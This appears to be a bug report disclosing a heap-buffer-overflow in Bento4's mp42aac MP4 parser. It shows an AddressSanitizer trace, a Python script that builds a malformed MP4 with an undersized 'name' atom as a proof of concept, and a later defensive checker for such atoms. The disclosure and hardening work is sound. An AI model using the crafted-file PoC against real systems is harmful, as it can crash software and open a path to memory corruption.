#5 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#6 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#7 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#8 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#9 0x626ae04ca119 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:419
#10 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#11 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#12 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#13 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#14 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#15 0x626ae04dda93 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
#16 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#17 0x626ae04dc261 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#18 0x626ae04913cd in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:104
#19 0x626ae0491946 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:78
#20 0x626ae048af8b in main /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#21 0x7da2ce22a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#22 0x7da2ce22a28a in __libc_start_main_impl ../csu/libc-start.c:360
#23 0x626ae048a844 in _start (/home/zhicheng/FuzzDriverGen/findreal/Bento4/build/mp42aac+0x2e844) (BuildId: 94ff24dd55ddc5b1351bd12a32fabe9570488544)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:996 in fread
Shadow bytes around the buggy address:
0x501ffffffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x501ffffffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x501fffffff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x501fffffff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x502000000000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
=>0x502000000080: fa fa 01 fa fa fa[01]fa fa fa fa fa fa fa fa fa
0x502000000100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8720==ABORTING
PoC
You can use the following Python script to generate a PoC.
#!/usr/bin/env python3
"""
Generate a minimalist MP4-style file that focuses on the metadata boxes.
The layout is:
  [ ilst ]          (size = 0 → claims the rest of the file)
  └─[ ---- ]        (size = 0)
     ├─[ mean ]     – very small body
     ├─[ name ]     – declared with an odd total length
     └─[ data ]     – comparatively large payload
Changing the numeric fields is an easy way to explore additional edge cases.
"""
import struct


def box(tag: bytes, payload: bytes) -> bytes:
    """Wrap a payload with a 32-bit big-endian size and four-letter tag."""
    return struct.pack(">I4s", 8 + len(payload), tag) + payload


def build(path: str = "meta_string_hbo.mp4") -> None:
    buf = bytearray()
    # Root metadata list. Size = 0 means "until EOF" for many parsers.
    buf += struct.pack(">I4s", 0, b"ilst")
    # Free-form metadata key container.
    buf += struct.pack(">I4s", 0, b"----")
    # Tiny 'mean' atom: only version/flags (4 bytes) after the header.
    buf += box(b"mean", b"\x00\x00\x00\x00")
    # 'name' atom with a deliberately unusual total size (11 bytes).
    # Body is three zero bytes → header (8) + body (3) = 11.
    buf += struct.pack(">I4s", 11, b"name") + b"\x00\x00\x00"
    # 'data' atom: type/locale field plus an oversized content blob.
    data_body = b"\x00\x00\x01\x64"   # standard 4-byte header inside 'data'
    data_body += b"\x00" * 230        # exaggerated payload
    data_body += b"xf"                # simple marker at the end
    buf += box(b"data", data_body)
    with open(path, "wb") as f:
        f.write(buf)
    print(f"PoC written to {path} ({len(buf)} bytes)")


if __name__ == "__main__":
    build()
You can also download the following PoC to reproduce this bug.
meta_string_hbo.mp4
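The following is an added example written for this page; it is not part of the report's PoC and not Bento4 code. It walks the box layout the PoC generator produces and applies the check a hardened parser needs: a string metadata atom must declare a size of at least header (8) plus its fixed field (4) before `size - 8 - 4` is computed as an unsigned length. The layout it assumes (size-0 boxes extend to the end of the parent; 'mean' and 'name' carry a 4-byte version/flags field before their characters) is taken from the PoC comments and the ASan trace above, not from reading Bento4's source, and the 32-bit wraparound it reports is what an unsigned subtraction of that shape would produce. The PoC bytes are rebuilt inline so the example runs stand-alone; the 243 bytes it finds remaining after the undersized 'name' atom's fixed field are the same 243 bytes as the "WRITE of size 243" in the sanitizer output.

```python
#!/usr/bin/env python3
"""Defensive walk over the metadata-box layout used by the PoC above.

Assumed layout (from the PoC comments and the ASan trace, not from Bento4's
source): each box is an 8-byte header (32-bit big-endian size, 4-char type),
a size of 0 means "to the end of the parent", and the string atoms 'mean' /
'name' carry a 4-byte version/flags field before their characters.
"""
import struct

BOX_HEADER = 8           # 32-bit size + 4-byte type
STRING_FIXED = 4         # version/flags field assumed for 'mean' and 'name'
STRING_ATOMS = {b"mean", b"name"}
CONTAINERS = {b"ilst", b"----"}


def build_poc() -> bytes:
    """Constructed inline so the example runs stand-alone: the same byte
    layout the PoC generator in this report produces (283 bytes)."""
    def box(tag, payload):
        return struct.pack(">I4s", BOX_HEADER + len(payload), tag) + payload
    buf = struct.pack(">I4s", 0, b"ilst")
    buf += struct.pack(">I4s", 0, b"----")
    buf += box(b"mean", b"\x00\x00\x00\x00")
    buf += struct.pack(">I4s", 11, b"name") + b"\x00\x00\x00"
    buf += box(b"data", b"\x00\x00\x01\x64" + b"\x00" * 230 + b"xf")
    return buf


def walk(buf: bytes, start: int = 0, end=None, depth: int = 0):
    """Yield (depth, type, declared_size, body_offset, box_end) for every box,
    clamping each box to its parent and refusing to loop on bad sizes."""
    end = len(buf) if end is None else end
    pos = start
    while pos + BOX_HEADER <= end:
        size, typ = struct.unpack_from(">I4s", buf, pos)
        if 0 < size < BOX_HEADER:
            # Cannot even hold its own header; subtracting the header from
            # this size would wrap. Report it and stop walking this level.
            yield depth, typ, size, pos + BOX_HEADER, pos + BOX_HEADER
            return
        box_end = end if size == 0 else min(pos + size, end)
        body = pos + BOX_HEADER
        yield depth, typ, size, body, box_end
        if typ in CONTAINERS:
            yield from walk(buf, body, box_end, depth + 1)
        if size == 0:
            return                    # a size-0 box consumed the rest
        pos = box_end


def check_string_atoms(buf: bytes) -> list:
    """Flag string atoms whose declared size cannot hold header + fixed field.

    For each one, also report the length a naive 32-bit unsigned
    size - 8 - 4 would wrap to, and how many bytes remain in the file after
    the fixed field (how much a read-to-EOF would actually write)."""
    findings = []
    needed = BOX_HEADER + STRING_FIXED
    for depth, typ, size, body, box_end in walk(buf):
        if typ in STRING_ATOMS and size < needed:
            findings.append({
                "type": typ,
                "declared_size": size,
                "wrapped_length": (size - needed) & 0xFFFFFFFF,
                "bytes_to_eof": len(buf) - (body + STRING_FIXED),
            })
    return findings


def string_payload_length(size: int) -> int:
    """Hardened form of the length computation: reject undersized atoms
    instead of letting the subtraction wrap."""
    needed = BOX_HEADER + STRING_FIXED
    if size < needed:
        raise ValueError(f"string atom size {size} below minimum {needed}")
    return size - needed


if __name__ == "__main__":
    poc = build_poc()
    for depth, typ, size, body, box_end in walk(poc):
        print("  " * depth + f"{typ.decode('latin-1')} size={size} "
              f"body@{body} end={box_end}")
    for f in check_string_atoms(poc):
        print(f"undersized {f['type']!r}: size {f['declared_size']}, "
              f"wrapped length 0x{f['wrapped_length']:08x}, "
              f"{f['bytes_to_eof']} bytes left to EOF")
```

Run it without arguments to print the box tree of the PoC and the single finding for the 11-byte 'name' atom. The same `walk` can be pointed at any other generated variant to see which atom trips the minimum-size check before handing the file to an instrumented Bento4 build.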